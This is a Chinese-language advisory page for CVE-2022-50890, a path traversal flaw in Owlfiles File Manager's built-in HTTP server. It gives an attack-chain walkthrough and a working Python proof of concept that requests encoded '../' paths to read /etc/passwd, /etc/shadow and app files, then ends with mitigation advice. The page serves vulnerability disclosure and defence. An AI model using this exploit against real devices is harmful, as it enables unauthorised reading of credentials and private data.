CVE-2022-50890: Owlfiles File Manager路径遍历漏洞

漏洞信息

漏洞编号

CVE-2022-50890

漏洞类型

路径遍历

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Owlfiles File Manager 12.0.1

漏洞概述

Owlfiles File Manager 12.0.1版本中存在一处严重的路径遍历漏洞，该漏洞位于软件内置的HTTP服务器组件中。攻击者可以通过构造特殊的HTTP GET请求，利用目录遍历序列（如../）绕过安全限制，访问目标设备上的任意系统文件和目录。此漏洞无需任何认证即可被利用，攻击复杂度较低，对系统机密性造成严重影响。攻击者可能利用此漏洞读取敏感系统配置文件、用户凭证、其他应用程序数据等敏感信息，从而为进一步攻击奠定基础。该漏洞影响使用Owlfiles应用的所有iOS/macOS设备，特别是那些在不可信网络环境中使用的设备。

技术细节

漏洞存在于Owlfiles File Manager的内置HTTP服务器功能中。服务器在处理用户请求的文件路径时，未对用户输入的路径进行充分的验证和过滤。攻击者可以通过在HTTP请求中插入../等目录遍历字符序列，使服务器返回原本被禁止访问的系统目录内容。例如，攻击者可以发送类似GET /..%2F..%2F..%2Fetc%2Fpasswd的请求来读取系统密码文件。漏洞的根本原因在于服务器端缺少对路径规范化的检查，未能正确处理相对路径遍历攻击。攻击者可以利用此漏洞遍历整个文件系统，访问应用沙箱外的系统文件，甚至可能访问其他应用的私有数据目录。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标设备上运行的Owlfiles File Manager应用，并确认其内置HTTP服务器处于活动状态（通常监听8080端口）

STEP 2

步骤2: 构造恶意请求

攻击者构造包含目录遍历序列（如../../../../../../etc/passwd）的HTTP GET请求，使用URL编码绕过简单的过滤器

STEP 3

步骤3: 发送攻击载荷

攻击者将恶意请求发送到Owlfiles HTTP服务器，服务器未正确验证路径输入，直接访问请求的文件路径

STEP 4

步骤4: 获取敏感文件

服务器返回被请求的系统文件内容，如/etc/passwd、配置文件、用户数据等敏感信息

STEP 5

步骤5: 横向移动或数据利用

攻击者利用获取的敏感信息进行进一步攻击，可能获取系统权限或访问其他应用数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2022-50890 PoC - Owlfiles File Manager Path Traversal
# Target: Owlfiles File Manager HTTP Server
# Vulnerability: Directory traversal in file access

def exploit_path_traversal(target_ip, target_port=8080):
    """
    Exploit path traversal vulnerability in Owlfiles File Manager
    to read arbitrary system files
    """
    
    # Target URL - Owlfiles built-in HTTP server
    base_url = f"http://{target_ip}:{target_port}"
    
    # Path traversal payloads to read system files
    payloads = [
        # Read /etc/passwd
        "../../../../../../etc/passwd",
        # Read shadow file (if permissions allow)
        "../../../../../../etc/shadow",
        # Read app's Info.plist
        "../../../../../../Applications/Owlfiles.app/Info.plist"
    ]
    
    for payload in payloads:
        # Encode the payload to bypass potential filters
        encoded_payload = urllib.parse.quote(payload)
        
        # Send malicious request
        url = f"{base_url}/{encoded_payload}"
        
        try:
            response = requests.get(url, timeout=10)
            
            if response.status_code == 200:
                print(f"[+] Success! File accessed: {payload}")
                print(f"[+] Content:\n{response.text[:500]}")
            else:
                print(f"[-] Failed for {payload} - Status: {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target IP
    target = "192.168.1.100"
    exploit_path_traversal(target)

影响范围

Owlfiles File Manager <= 12.0.1

防御指南

临时缓解措施

在官方修复版本发布之前，建议用户关闭Owlfiles的内置HTTP服务器功能，避免在不可信的公共网络环境中使用该应用。如需远程文件访问，建议使用VPN等安全通道。同时监控系统日志，警惕异常的目录遍历请求模式。